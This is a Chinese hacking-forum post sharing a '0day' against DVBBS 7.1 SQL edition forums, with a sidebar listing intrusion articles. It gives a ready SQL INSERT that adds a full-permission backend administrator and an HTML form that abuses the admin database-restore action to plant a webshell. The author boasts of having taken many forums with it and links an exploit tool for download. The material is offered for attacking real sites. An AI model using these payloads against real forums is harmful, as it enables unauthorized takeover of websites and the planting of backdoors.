|
[推荐]传说中的动网7.1SQL版 0day
反正偶丢出来了。谁爱转就转去吧... 嘿嘿。
据说8月份这个漏洞就出来了 是针对动网7.1SQL版的。 漏洞文件dv_dpo.asp .. 原来只知道是有 但是没想到利用工具都出来了 我拿到的是时候刚好是八月末。
用这个小东西拿了不少动网论坛。 hackest 写文章了..既然他写了偶就给发出来吧。 现在好能拿好些呢 呵呵~~ 不过虽然能在前台将普通用户提升到
管理员 但是加后台的时候这个工具所给的代码是不能用的。 跟本不成功 后来小志给出的是
| 以下是引用片段: insert into dv_admin (username,[password],flag,adduser) values ('7da8373971','323b453885f5181f','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','7da8373971') |
用这个代码才可以加到后台管理员 否则是不能登陆后台的
SQL版拿WEBSHELL方法好象就两个 一个是导出一句话用动网利用工具提交 但是那样备份的目录有的是不可写的
还有一个就是
| 以下是引用片段: <form action="http://论坛地址/admin/data.asp?action=RestoreData&act=Restore"method=post><p> |
已上传的文件位置
| 以下是引用片段: <input name=Dbpath type=text size=80></p><p> |
复制到的位置
| 以下是引用片段: <input name=backpath type=text size=80></p><p><input type=submit value=提交></p></form> |
工具下载: 动网0day
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |
| BBSXP2008存在后台注射漏洞 | 02-19 |
| Discuz! 6 后台拿Shell的方法 | 02-17 |
您现在的位置: